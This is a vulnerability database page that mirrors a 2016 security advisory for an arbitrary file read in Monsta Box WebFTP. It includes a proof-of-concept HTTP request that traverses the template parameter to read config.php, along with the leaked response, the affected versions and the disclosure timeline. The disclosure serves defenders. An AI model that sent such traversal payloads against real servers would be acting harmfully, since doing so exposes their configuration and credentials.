Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Monsta Box WebFTP Arbitrary File Read

🗓️ 08 Apr 2016 00:00:00Reported by Imre RadType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 21 Views

Monsta Box WebFTP Arbitrary File Read vulnerability in template parameter allows arbitrary file acces

Code
`Application  
-----------  
"MONSTA Box is a lightweight open-source file manager you can install on  
your website or server * to easily manage your files through any browser."  
(Description from the official website http://www.monstahq.com/)  
  
  
Vulnerability  
-------------  
The Monsta Box WebFTP application supports file templates when creating  
new files. The template parameter is part of the HTTP request so it is a  
user input and it was not sanitized correctly. By sending a HTTP request  
with modified template parameter it was possible to traverse the  
template directory and read arbitrary files (in context of the Monsta  
Box WebFTP application).  
  
  
PoC  
---  
A proof of concept request/response to read the config.php file of the  
Monsta Box installation (note the template parameter of the HTTP request):  
  
POST /? HTTP/1.1  
Host: somehost  
Referer: http://somereferer/  
Content-Length: 352  
Cookie: PHPSESSID=somecookie  
  
  
&ftpAction=newFile&=Refresh&=Download&=Cut&=Copy&=Paste&=Rename&=Delete&=Logout&newFile=xxx&template=..%2Fconfig.php&=OK&=Cancel&=~&=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&folderAction[]=&=New%20Folder&=New%20File&=Fetch%20File&=Upload%20Files&=Repeat%20Upload&windowWidth=1280&windowHeight=913  
  
HTTP/1.1 200 OK  
Server: nginx  
Date: Sun, 27 Mar 2016 19:34:21 GMT  
Content-Type: text/html  
Transfer-Encoding: chunked  
Connection: keep-alive  
X-Frame-Options: SAMEORIGIN  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
  
1cac  
<div id="blackOutDiv"><div id="popupFrame" style="left: 110px; top:  
60px; width: 1030px;"><div id="popupHeaderAction">Editing:  
/xxx</div><div id="popupBodyAction" style="height: 693px;"><input  
type="hidden" name="file" value="~/xxx"><textarea name="editContent"  
id="editContent" style="height: 608px;"><?php  
  
# Open README file for descriptions and help.  
  
$ftpHost = "somehost";  
$ftpPort = "21";  
  
...  
  
  
Affected versions  
-----------------  
The above vulnerability was fixed in version 1.8.3. Older versions of  
Monsta Box with template support are vulnerable.  
  
  
Timeline  
--------  
2016-03-29: Vendor contacted for appropriate contact person to report to  
2016-03-30: Vulnerability was reported  
2016-03-31: Fixed version was published  
2016-04-07: Public disclosure  
  
  
Discovered by  
-------------  
Imre RAD  
www.search-lab.hu  
www.scademy.com  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Apr 2016 00:00Current
0.5Low risk
Vulners AI Score0.5
monsta boxwebftparbitrary file readvulnerabilitytemplate parameterhttp requestfile managersecurity advisoryimre rad
21